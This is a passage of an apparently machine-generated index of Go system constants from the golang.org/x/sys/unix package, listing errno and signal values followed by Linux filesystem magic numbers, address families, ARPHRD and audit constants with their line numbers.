syscall.Errno(0x21) constant EDOOFUS (line 1883) | EDOOFUS = syscall.Errno(0x58) constant EDQUOT (line 1884) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1885) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1886) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1887) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1888) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1889) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1890) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1891) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1892) | EILSEQ = syscall.Errno(0x56) constant EINPROGRESS (line 1893) | EINPROGRESS = syscall.Errno(0x24) constant EINTEGRITY (line 1894) | EINTEGRITY = syscall.Errno(0x61) constant EINTR (line 1895) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1896) | EINVAL = syscall.Errno(0x16) constant EIO (line 1897) | EIO = syscall.Errno(0x5) constant EISCONN (line 1898) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1899) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1900) | ELAST = syscall.Errno(0x61) constant ELOOP (line 1901) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1902) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1903) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1904) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1905) | EMULTIHOP = syscall.Errno(0x5a) constant ENAMETOOLONG (line 1906) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1907) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1908) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1909) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1910) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1911) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1912) | ENOATTR = syscall.Errno(0x57) constant ENOBUFS (line 1913) | ENOBUFS = syscall.Errno(0x37) constant ENODEV (line 1914) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1915) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1916) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1917) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1918) | ENOLINK = syscall.Errno(0x5b) constant ENOMEM (line 1919) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1920) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1921) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1922) | ENOSPC = syscall.Errno(0x1c) constant ENOSYS (line 1923) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1924) | ENOTBLK = syscall.Errno(0xf) constant ENOTCAPABLE (line 1925) | ENOTCAPABLE = syscall.Errno(0x5d) constant ENOTCONN (line 1926) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1927) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1928) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTRECOVERABLE (line 1929) | ENOTRECOVERABLE = syscall.Errno(0x5f) constant ENOTSOCK (line 1930) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1931) | ENOTSUP = syscall.Errno(0x2d) constant ENOTTY (line 1932) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1933) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1934) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1935) | EOVERFLOW = syscall.Errno(0x54) constant EOWNERDEAD (line 1936) | EOWNERDEAD = syscall.Errno(0x60) constant EPERM (line 1937) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1938) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1939) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1940) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1941) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1942) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1943) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1944) | EPROTO = syscall.Errno(0x5c) constant EPROTONOSUPPORT (line 1945) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1946) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1947) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1948) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1949) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1950) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1951) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1952) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1953) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1954) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1955) | ESTALE = syscall.Errno(0x46) constant ETIMEDOUT (line 1956) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1957) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1958) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1959) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1960) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1961) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1966) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1967) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1968) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1969) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1970) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1971) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1972) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1973) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1974) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1975) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1976) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1977) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1978) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1979) | SIGKILL = syscall.Signal(0x9) constant SIGLIBRT (line 1980) | SIGLIBRT = syscall.Signal(0x21) constant SIGLWP (line 1981) | SIGLWP = syscall.Signal(0x20) constant SIGPIPE (line 1982) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1983) | SIGPROF = syscall.Signal(0x1b) constant SIGQUIT (line 1984) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1985) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1986) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1987) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1988) | SIGTERM = syscall.Signal(0xf) constant SIGTHR (line 1989) | SIGTHR = syscall.Signal(0x20) constant SIGTRAP (line 1990) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1991) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1992) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1993) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1994) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1995) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1996) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1997) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1998) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1999) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 2000) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_linux.go constant AAFS_MAGIC (line 10) | AAFS_MAGIC = 0x5a3c69f0 constant ADFS_SUPER_MAGIC (line 11) | ADFS_SUPER_MAGIC = 0xadf5 constant AFFS_SUPER_MAGIC (line 12) | AFFS_SUPER_MAGIC = 0xadff constant AFS_FS_MAGIC (line 13) | AFS_FS_MAGIC = 0x6b414653 constant AFS_SUPER_MAGIC (line 14) | AFS_SUPER_MAGIC = 0x5346414f constant AF_ALG (line 15) | AF_ALG = 0x26 constant AF_APPLETALK (line 16) | AF_APPLETALK = 0x5 constant AF_ASH (line 17) | AF_ASH = 0x12 constant AF_ATMPVC (line 18) | AF_ATMPVC = 0x8 constant AF_ATMSVC (line 19) | AF_ATMSVC = 0x14 constant AF_AX25 (line 20) | AF_AX25 = 0x3 constant AF_BLUETOOTH (line 21) | AF_BLUETOOTH = 0x1f constant AF_BRIDGE (line 22) | AF_BRIDGE = 0x7 constant AF_CAIF (line 23) | AF_CAIF = 0x25 constant AF_CAN (line 24) | AF_CAN = 0x1d constant AF_DECnet (line 25) | AF_DECnet = 0xc constant AF_ECONET (line 26) | AF_ECONET = 0x13 constant AF_FILE (line 27) | AF_FILE = 0x1 constant AF_IB (line 28) | AF_IB = 0x1b constant AF_IEEE802154 (line 29) | AF_IEEE802154 = 0x24 constant AF_INET (line 30) | AF_INET = 0x2 constant AF_INET6 (line 31) | AF_INET6 = 0xa constant AF_IPX (line 32) | AF_IPX = 0x4 constant AF_IRDA (line 33) | AF_IRDA = 0x17 constant AF_ISDN (line 34) | AF_ISDN = 0x22 constant AF_IUCV (line 35) | AF_IUCV = 0x20 constant AF_KCM (line 36) | AF_KCM = 0x29 constant AF_KEY (line 37) | AF_KEY = 0xf constant AF_LLC (line 38) | AF_LLC = 0x1a constant AF_LOCAL (line 39) | AF_LOCAL = 0x1 constant AF_MAX (line 40) | AF_MAX = 0x2e constant AF_MCTP (line 41) | AF_MCTP = 0x2d constant AF_MPLS (line 42) | AF_MPLS = 0x1c constant AF_NETBEUI (line 43) | AF_NETBEUI = 0xd constant AF_NETLINK (line 44) | AF_NETLINK = 0x10 constant AF_NETROM (line 45) | AF_NETROM = 0x6 constant AF_NFC (line 46) | AF_NFC = 0x27 constant AF_PACKET (line 47) | AF_PACKET = 0x11 constant AF_PHONET (line 48) | AF_PHONET = 0x23 constant AF_PPPOX (line 49) | AF_PPPOX = 0x18 constant AF_QIPCRTR (line 50) | AF_QIPCRTR = 0x2a constant AF_RDS (line 51) | AF_RDS = 0x15 constant AF_ROSE (line 52) | AF_ROSE = 0xb constant AF_ROUTE (line 53) | AF_ROUTE = 0x10 constant AF_RXRPC (line 54) | AF_RXRPC = 0x21 constant AF_SECURITY (line 55) | AF_SECURITY = 0xe constant AF_SMC (line 56) | AF_SMC = 0x2b constant AF_SNA (line 57) | AF_SNA = 0x16 constant AF_TIPC (line 58) | AF_TIPC = 0x1e constant AF_UNIX (line 59) | AF_UNIX = 0x1 constant AF_UNSPEC (line 60) | AF_UNSPEC = 0x0 constant AF_VSOCK (line 61) | AF_VSOCK = 0x28 constant AF_WANPIPE (line 62) | AF_WANPIPE = 0x19 constant AF_X25 (line 63) | AF_X25 = 0x9 constant AF_XDP (line 64) | AF_XDP = 0x2c constant ALG_OP_DECRYPT (line 65) | ALG_OP_DECRYPT = 0x0 constant ALG_OP_ENCRYPT (line 66) | ALG_OP_ENCRYPT = 0x1 constant ALG_SET_AEAD_ASSOCLEN (line 67) | ALG_SET_AEAD_ASSOCLEN = 0x4 constant ALG_SET_AEAD_AUTHSIZE (line 68) | ALG_SET_AEAD_AUTHSIZE = 0x5 constant ALG_SET_DRBG_ENTROPY (line 69) | ALG_SET_DRBG_ENTROPY = 0x6 constant ALG_SET_IV (line 70) | ALG_SET_IV = 0x2 constant ALG_SET_KEY (line 71) | ALG_SET_KEY = 0x1 constant ALG_SET_KEY_BY_KEY_SERIAL (line 72) | ALG_SET_KEY_BY_KEY_SERIAL = 0x7 constant ALG_SET_OP (line 73) | ALG_SET_OP = 0x3 constant ANON_INODE_FS_MAGIC (line 74) | ANON_INODE_FS_MAGIC = 0x9041934 constant ARPHRD_6LOWPAN (line 75) | ARPHRD_6LOWPAN = 0x339 constant ARPHRD_ADAPT (line 76) | ARPHRD_ADAPT = 0x108 constant ARPHRD_APPLETLK (line 77) | ARPHRD_APPLETLK = 0x8 constant ARPHRD_ARCNET (line 78) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ASH (line 79) | ARPHRD_ASH = 0x30d constant ARPHRD_ATM (line 80) | ARPHRD_ATM = 0x13 constant ARPHRD_AX25 (line 81) | ARPHRD_AX25 = 0x3 constant ARPHRD_BIF (line 82) | ARPHRD_BIF = 0x307 constant ARPHRD_CAIF (line 83) | ARPHRD_CAIF = 0x336 constant ARPHRD_CAN (line 84) | ARPHRD_CAN = 0x118 constant ARPHRD_CHAOS (line 85) | ARPHRD_CHAOS = 0x5 constant ARPHRD_CISCO (line 86) | ARPHRD_CISCO = 0x201 constant ARPHRD_CSLIP (line 87) | ARPHRD_CSLIP = 0x101 constant ARPHRD_CSLIP6 (line 88) | ARPHRD_CSLIP6 = 0x103 constant ARPHRD_DDCMP (line 89) | ARPHRD_DDCMP = 0x205 constant ARPHRD_DLCI (line 90) | ARPHRD_DLCI = 0xf constant ARPHRD_ECONET (line 91) | ARPHRD_ECONET = 0x30e constant ARPHRD_EETHER (line 92) | ARPHRD_EETHER = 0x2 constant ARPHRD_ETHER (line 93) | ARPHRD_ETHER = 0x1 constant ARPHRD_EUI64 (line 94) | ARPHRD_EUI64 = 0x1b constant ARPHRD_FCAL (line 95) | ARPHRD_FCAL = 0x311 constant ARPHRD_FCFABRIC (line 96) | ARPHRD_FCFABRIC = 0x313 constant ARPHRD_FCPL (line 97) | ARPHRD_FCPL = 0x312 constant ARPHRD_FCPP (line 98) | ARPHRD_FCPP = 0x310 constant ARPHRD_FDDI (line 99) | ARPHRD_FDDI = 0x306 constant ARPHRD_FRAD (line 100) | ARPHRD_FRAD = 0x302 constant ARPHRD_HDLC (line 101) | ARPHRD_HDLC = 0x201 constant ARPHRD_HIPPI (line 102) | ARPHRD_HIPPI = 0x30c constant ARPHRD_HWX25 (line 103) | ARPHRD_HWX25 = 0x110 constant ARPHRD_IEEE1394 (line 104) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 105) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_IEEE80211 (line 106) | ARPHRD_IEEE80211 = 0x321 constant ARPHRD_IEEE80211_PRISM (line 107) | ARPHRD_IEEE80211_PRISM = 0x322 constant ARPHRD_IEEE80211_RADIOTAP (line 108) | ARPHRD_IEEE80211_RADIOTAP = 0x323 constant ARPHRD_IEEE802154 (line 109) | ARPHRD_IEEE802154 = 0x324 constant ARPHRD_IEEE802154_MONITOR (line 110) | ARPHRD_IEEE802154_MONITOR = 0x325 constant ARPHRD_IEEE802_TR (line 111) | ARPHRD_IEEE802_TR = 0x320 constant ARPHRD_INFINIBAND (line 112) | ARPHRD_INFINIBAND = 0x20 constant ARPHRD_IP6GRE (line 113) | ARPHRD_IP6GRE = 0x337 constant ARPHRD_IPDDP (line 114) | ARPHRD_IPDDP = 0x309 constant ARPHRD_IPGRE (line 115) | ARPHRD_IPGRE = 0x30a constant ARPHRD_IRDA (line 116) | ARPHRD_IRDA = 0x30f constant ARPHRD_LAPB (line 117) | ARPHRD_LAPB = 0x204 constant ARPHRD_LOCALTLK (line 118) | ARPHRD_LOCALTLK = 0x305 constant ARPHRD_LOOPBACK (line 119) | ARPHRD_LOOPBACK = 0x304 constant ARPHRD_MCTP (line 120) | ARPHRD_MCTP = 0x122 constant ARPHRD_METRICOM (line 121) | ARPHRD_METRICOM = 0x17 constant ARPHRD_NETLINK (line 122) | ARPHRD_NETLINK = 0x338 constant ARPHRD_NETROM (line 123) | ARPHRD_NETROM = 0x0 constant ARPHRD_NONE (line 124) | ARPHRD_NONE = 0xfffe constant ARPHRD_PHONET (line 125) | ARPHRD_PHONET = 0x334 constant ARPHRD_PHONET_PIPE (line 126) | ARPHRD_PHONET_PIPE = 0x335 constant ARPHRD_PIMREG (line 127) | ARPHRD_PIMREG = 0x30b constant ARPHRD_PPP (line 128) | ARPHRD_PPP = 0x200 constant ARPHRD_PRONET (line 129) | ARPHRD_PRONET = 0x4 constant ARPHRD_RAWHDLC (line 130) | ARPHRD_RAWHDLC = 0x206 constant ARPHRD_RAWIP (line 131) | ARPHRD_RAWIP = 0x207 constant ARPHRD_ROSE (line 132) | ARPHRD_ROSE = 0x10e constant ARPHRD_RSRVD (line 133) | ARPHRD_RSRVD = 0x104 constant ARPHRD_SIT (line 134) | ARPHRD_SIT = 0x308 constant ARPHRD_SKIP (line 135) | ARPHRD_SKIP = 0x303 constant ARPHRD_SLIP (line 136) | ARPHRD_SLIP = 0x100 constant ARPHRD_SLIP6 (line 137) | ARPHRD_SLIP6 = 0x102 constant ARPHRD_TUNNEL (line 138) | ARPHRD_TUNNEL = 0x300 constant ARPHRD_TUNNEL6 (line 139) | ARPHRD_TUNNEL6 = 0x301 constant ARPHRD_VOID (line 140) | ARPHRD_VOID = 0xffff constant ARPHRD_VSOCKMON (line 141) | ARPHRD_VSOCKMON = 0x33a constant ARPHRD_X25 (line 142) | ARPHRD_X25 = 0x10f constant AUDIT_ADD (line 143) | AUDIT_ADD = 0x3eb constant AUDIT_ADD_RULE (line 144) | AUDIT_ADD_RULE = 0x3f3 constant AUDIT_ALWAYS (line 145) | AUDIT_ALWAYS = 0x2 constant AUDIT_ANOM_ABEND (line 146) | AUDIT_ANOM_ABEND = 0x6a5 constant AUDIT_ANOM_CREAT (line 147) | AUDIT_ANOM_CREAT = 0x6a7 constant AUDIT_ANOM_LINK (line 148) | AUDIT_ANOM_LINK = 0x6a6 constant AUDIT_ANOM_PROMISCUOUS (line 149) | AUDIT_ANOM_PROMISCUOUS = 0x6a4 constant AUDIT_ARCH (line 150) | AUDIT_ARCH = 0xb constant AUDIT_ARCH_AARCH64 (line 151) | AUDIT_ARCH_AARCH64 = 0xc00000b7 constant AUDIT_ARCH_ALPHA (line 152) | AUDIT_ARCH_ALPHA = 0xc0009026 constant AUDIT_ARCH_ARCOMPACT (line 153) | AUDIT_ARCH_ARCOMPACT = 0x4000005d constant AUDIT_ARCH_ARCOMPACTBE (line 154) | AUDIT_ARCH_ARCOMPACTBE = 0x5d constant AUDIT_ARCH_ARCV2 (line 155) | AUDIT_ARCH_ARCV2 = 0x400000c3 constant AUDIT_ARCH_ARCV2BE (line 156) | AUDIT_ARCH_ARCV2BE = 0xc3 constant AUDIT_ARCH_ARM (line 157) | AUDIT_ARCH_ARM = 0x40000028 constant AUDIT_ARCH_ARMEB (line 158) | AUDIT_ARCH_ARMEB = 0x28 constant AUDIT_ARCH_C6X (line 159) | AUDIT_ARCH_C6X = 0x4000008c constant AUDIT_ARCH_C6XBE (line 160) | AUDIT_ARCH_C6XBE = 0x8c constant AUDIT_ARCH_CRIS (line 161) | AUDIT_ARCH_CRIS = 0x4000004c constant AUDIT_ARCH_CSKY (line 162) | AUDIT_ARCH_CSKY = 0x400000fc constant AUDIT_ARCH_FRV (line 163) | AUDIT_ARCH_FRV = 0x5441 constant AUDIT_ARCH_H8300 (line 164) | AUDIT_ARCH_H8300 = 0x2e constant AUDIT_ARCH_HEXAGON (line 165) | AUDIT_ARCH_HEXAGON = 0xa4 constant AUDIT_ARCH_I386 (line 166) | AUDIT_ARCH_I386 = 0x40000003 constant AUDIT_ARCH_IA64 (line 167) | AUDIT_ARCH_IA64 = 0xc0000032 constant AUDIT_ARCH_LOONGARCH32 (line 168) | AUDIT_ARCH_LOONGARCH32 = 0x40000102 constant AUDIT_ARCH_LOONGARCH64 (line 169) | AUDIT_ARCH_LOONGARCH64 = 0xc0000102 constant AUDIT_ARCH_M32R (line 170) | AUDIT_ARCH_M32R = 0x58 constant AUDIT_ARCH_M68K (line 171) | AUDIT_ARCH_M68K = 0x4 constant AUDIT_ARCH_MICROBLAZE (line 172) | AUDIT_ARCH_MICROBLAZE = 0xbd constant AUDIT_ARCH_MIPS (line 173) | AUDIT_ARCH_MIPS = 0x8 constant AUDIT_ARCH_MIPS64 (line 174) | AUDIT_ARCH_MIPS64 = 0x80000008 constant AUDIT_ARCH_MIPS64N32 (line 175) | AUDIT_ARCH_MIPS64N32 = 0xa0000008 constant AUDIT_ARCH_MIPSEL (line 176) | AUDIT_ARCH_MIPSEL = 0x40000008 constant AUDIT_ARCH_MIPSEL64 (line 177) | AUDIT_ARCH_MIPSEL64 = 0xc0000008 constant AUDIT_ARCH_MIPSEL64N32 (line 178) | AUDIT_ARCH_MIPSEL64N32 = 0xe0000008 constant AUDIT_ARCH_NDS32 (line 179) | AUDIT_ARCH_NDS32 = 0x400000a7 constant AUDIT_ARCH_NDS32BE (line 180) | AUDIT_ARCH_NDS32BE = 0xa7 constant AUDIT_ARCH_NIOS2 (line 181) | AUDIT_ARCH_NIOS2 = 0x40000071 constant AUDIT_ARCH_OPENRISC (line 182) | AUDIT_ARCH_OPENRISC = 0x5c constant AUDIT_ARCH_PARISC (line 183) | AUDIT_ARCH_PARISC = 0xf constant AUDIT_ARCH_PARISC64 (line 184) | AUDIT_ARCH_PARISC64 = 0x8000000f constant AUDIT_ARCH_PPC (line 185) | AUDIT_ARCH_PPC = 0x14 constant AUDIT_ARCH_PPC64 (line 186) | AUDIT_ARCH_PPC64 = 0x80000015 constant AUDIT_ARCH_PPC64LE (line 187) | AUDIT_ARCH_PPC64LE = 0xc0000015 constant AUDIT_ARCH_RISCV32 (line 188) | AUDIT_ARCH_RISCV32 = 0x400000f3 constant AUDIT_ARCH_RISCV64 (line 189) | AUDIT_ARCH_RISCV64 = 0xc00000f3 constant AUDIT_ARCH_S390 (line 190) | AUDIT_ARCH_S390 = 0x16 constant AUDIT_ARCH_S390X (line 191) | AUDIT_ARCH_S390X = 0x80000016 constant AUDIT_ARCH_SH (line 192) | AUDIT_ARCH_SH = 0x2a constant AUDIT_ARCH_SH64 (line 193) | AUDIT_ARCH_SH64 = 0x8000002a constant AUDIT_ARCH_SHEL (line 194) | AUDIT_ARCH_SHEL = 0x4000002a constant AUDIT_ARCH_SHEL64 (line 195) | AUDIT_ARCH_SHEL64 = 0xc000002a constant AUDIT_ARCH_SPARC (line 196) | AUDIT_ARCH_SPARC = 0x2 constant AUDIT_ARCH_SPARC64 (line 197) | AUDIT_ARCH_SPARC64 = 0x8000002b constant AUDIT_ARCH_TILEGX (line 198) | AUDIT_ARCH_TILEGX = 0xc00000bf constant AUDIT_ARCH_TILEGX32 (line 199) | AUDIT_ARCH_TILEGX32 = 0x400000bf constant AUDIT_ARCH_TILEPRO (line 200) | AUDIT_ARCH_TILEPRO = 0x400000bc constant AUDIT_ARCH_UNICORE (line 201) | AUDIT_ARCH_UNICORE = 0x4000006e constant AUDIT_ARCH_X86_64 (line 202) | AUDIT_ARCH_X86_64 = 0xc000003e constant AUDIT_ARCH_XTENSA (line 203) | AUDIT_ARCH_XTENSA = 0x5e constant AUDIT_ARG0 (line 204) | AUDIT_ARG0 = 0xc8 constant AUDIT_ARG1 (line 205) | AUDIT_ARG1 = 0xc9 constant AUDIT_ARG2 (line 206) | AUDIT_ARG2 = 0xca constant AUDIT_ARG3 (line 207) | AUDIT_ARG3 = 0xcb constant AUDIT_AVC (line 208) | AUDIT_AVC = 0x578 constant AUDIT_AVC_PATH (line 209) | AUDIT_AVC_PATH = 0x57a constant AUDIT_BITMASK_SIZE (line 210) | AUDIT_BITMASK_SIZE = 0x40 constant AUDIT_BIT_MASK (line 211) | AUDIT_BIT_MASK = 0x8000000 constant AUDIT_BIT_TEST (line 212) | AUDIT_BIT_TEST = 0x48000000 constant AUDIT_BPF (line 213) | AUDIT_BPF = 0x536 constant AUDIT_BPRM_FCAPS (line 214) | AUDIT_BPRM_FCAPS = 0x529 constant AUDIT_CAPSET (line 215) | AUDIT_CAPSET = 0x52a constant AUDIT_CLASS_CHATTR (line 216) | AUDIT_CLASS_CHATTR = 0x2 constant AUDIT_CLASS_CHATTR_32 (line 217) | AUDIT_CLASS_CHATTR_32 = 0x3 constant AUDIT_CLASS_DIR_WRITE (line 218) | AUDIT_CLASS_DIR_WRITE = 0x0 constant AUDIT_CLASS_DIR_WRITE_32 (line 219) | AUDIT_CLASS_DIR_WRITE_32 = 0x1 constant AUDIT_CLASS_READ (line 220) | AUDIT_CLASS_READ = 0x4 constant AUDIT_CLASS_READ_32 (line 221) | AUDIT_CLASS_READ_32 = 0x5 constant AUDIT_CLASS_SIGNAL (line 222) | AUDIT_CLASS_SIGNAL = 0x8 constant AUDIT_CLASS_SIGNAL_32 (line 223) | AUDIT_CLASS_SIGNAL_32 = 0x9 constant AUDIT_CLASS_WRITE (line 224) | AUDIT_CLASS_WRITE = 0x6 constant AUDIT_CLASS_WRITE_32 (line 225) | AUDIT_CLASS_WRITE_32 = 0x7 constant AUDIT_COMPARE_AUID_TO_EUID (line 226) | AUDIT_COMPARE_AUID_TO_EUID = 0x10 constant AUDIT_COMPARE_AUID_TO_FSUID (line 227) | AUDIT_COMPARE_AUID_TO_FSUID = 0xe constant AUDIT_COMPARE_AUID_TO_OBJ_UID (line 228) | AUDIT_COMPARE_AUID_TO_OBJ_UID = 0x5 constant AUDIT_COMPARE_AUID_TO_SUID (line 229) | AUDIT_COMPARE_AUID_TO_SUID = 0xf constant AUDIT_COMPARE_EGID_TO_FSGID (line 230) | AUDIT_COMPARE_EGID_TO_FSGID = 0x17 constant AUDIT_COMPARE_EGID_TO_OBJ_GID (line 231) | AUDIT_COMPARE_EGID_TO_OBJ_GID = 0x4 constant AUDIT_COMPARE_EGID_TO_SGID (line 232) | AUDIT_COMPARE_EGID_TO_SGID = 0x18 constant AUDIT_COMPARE_EUID_TO_FSUID (line 233) | AUDIT_COMPARE_EUID_TO_FSUID = 0x12 constant AUDIT_COMPARE_EUID_TO_OBJ_UID (line 234) | AUDIT_COMPARE_EUID_TO_OBJ_UID = 0x3 constant AUDIT_COMPARE_EUID_TO_SUID (line 235) | AUDIT_COMPARE_EUID_TO_SUID = 0x11 constant AUDIT_COMPARE_FSGID_TO_OBJ_GID (line 236) | AUDIT_COMPARE_FSGID_TO_OBJ_GID = 0x9 constant AUDIT_COMPARE_FSUID_TO_OBJ_UID (line 237) | AUDIT_COMPARE_FSUID_TO_OBJ_UID = 0x8 constant AUDIT_COMPARE_GID_TO_EGID (line 238) | AUDIT_COMPARE_GID_TO_EGID = 0x14 constant AUDIT_COMPARE_GID_TO_FSGID (line 239) | AUDIT_COMPARE_GID_TO_FSGID = 0x15 constant AUDIT_COMPARE_GID_TO_OBJ_GID (line 240) | AUDIT_COMPARE_GID_TO_OBJ_GID = 0x2 constant AUDIT_COMPARE_GID_TO_SGID (line 241) | AUDIT_COMPARE_GID_TO_SGID = 0x16 constant AUDIT_COMPARE_SGID_TO_FSGID (line 242) | AUDIT_COMPARE_SGID_TO_FSGID = 0x19 constant AUDIT_COMPARE_SGID_TO_OBJ_GID (line 243) | AUDIT_COMPARE_SGID_TO_OBJ_GID = 0x7 constant AUDIT_COMPARE_SUID_TO_FSUID (line 244) | AUDIT_COMPARE_SUID_TO_FSUID = 0x13 constant AUDIT_COMPARE_SUID_TO_OBJ_UID (line 245) | AUDIT_COMPARE_SUID_TO_OBJ_UID = 0x6 constant AUDIT_COMPARE_UID_TO_AUID (line 246) | AUDIT_COMPARE_UID_TO_AUID = 0xa constant AUDIT_COMPARE_UID_TO_EUID (line 247) | AUDIT_COMPARE_UID_TO_EUID = 0xb constant AUDIT_COMPARE_UID_TO_FSUID (line 248) | AUDIT_COMPARE_UID_TO_FSUID = 0xc constant AUDIT_COMPARE_UID_TO_OBJ_UID (line 249) | AUDIT_COMPARE_UID_TO_OBJ_UID = 0x1 constant AUDIT_COMPARE_UID_TO_SUID (line 250) | AUDIT_COMPARE_UID_TO_SUID = 0xd constant AUDIT_CONFIG_CHANGE (line 251) | AUDIT_CONFIG_CHANGE = 0x519 constant AUDIT_CWD (line 252) | AUDIT_CWD = 0x51b constant AUDIT_DAEMON_ABORT (line 253) | AUDIT_DAEMON_ABORT = 0x4b2 constant AUDIT_DAEMON_CONFIG (line 254) | AUDIT_DAEMON_CONFIG = 0x4b3 constant AUDIT_DAEMON_END (line 255) | AUDIT_DAEMON_END = 0x4b1 constant AUDIT_DAEMON_START (line 256) | AUDIT_DAEMON_START = 0x4b0 constant AUDIT_DEL (line 257) | AUDIT_DEL = 0x3ec constant AUDIT_DEL_RULE (line 258) | AUDIT_DEL_RULE = 0x3f4 constant AUDIT_DEVMAJOR (line 259) | AUDIT_DEVMAJOR = 0x64 constant AUDIT_DEVMINOR (line 260) | AUDIT_DEVMINOR = 0x65 constant AUDIT_DIR (line 261) | AUDIT_DIR = 0x6b constant AUDIT_DM_CTRL (line 262) | AUDIT_DM_CTRL = 0x53a constant AUDIT_DM_EVENT (line 263) | AUDIT_DM_EVENT = 0x53b constant AUDIT_EGID (line 264) | AUDIT_EGID = 0x6 constant AUDIT_EOE (line 265) | AUDIT_EOE = 0x528 constant AUDIT_EQUAL (line 266) | AUDIT_EQUAL = 0x40000000 constant AUDIT_EUID (line 267) | AUDIT_EUID = 0x2 constant AUDIT_EVENT_LISTENER (line 268) | AUDIT_EVENT_LISTENER = 0x537 constant AUDIT_EXE (line 269) | AUDIT_EXE = 0x70 constant AUDIT_EXECVE (line 270) | AUDIT_EXECVE = 